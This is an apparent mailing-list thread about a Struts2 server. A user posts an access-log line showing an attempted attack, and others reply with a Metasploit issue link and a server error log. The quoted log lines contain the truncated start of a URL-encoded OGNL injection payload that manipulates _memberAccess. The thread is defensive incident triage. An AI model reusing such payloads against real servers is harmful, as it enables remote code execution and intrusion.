OK, thanks, good work! Did return 500 so looks damage was done.
from the logs
2019-01-18 18:13:33,218 WARN
org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest
JakartaMultiPartRequest:parse - Unable to parse request
org.apache.commons.fileupload.InvalidFileNameException: Invalid file n
niedz., 20 sty 2019 o 13:02 Greg Huber napisaĆ(a):
>
> Any ideas?
>
> 14.98.162.41 - - [18/Jan/2019:18:13:32 +] "POST
> /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionC
Possibly in this section?:
https://github.com/rapid7/metasploit-framework/issues/8064
Am 20.01.19 um 13:02 schrieb Greg Huber:
> Any ideas?
>
> 14.98.162.41 - - [18/Jan/2019:18:13:32 +] "POST
> /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%
Any ideas?
14.98.162.41 - - [18/Jan/2019:18:13:32 +] "POST
/%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstan
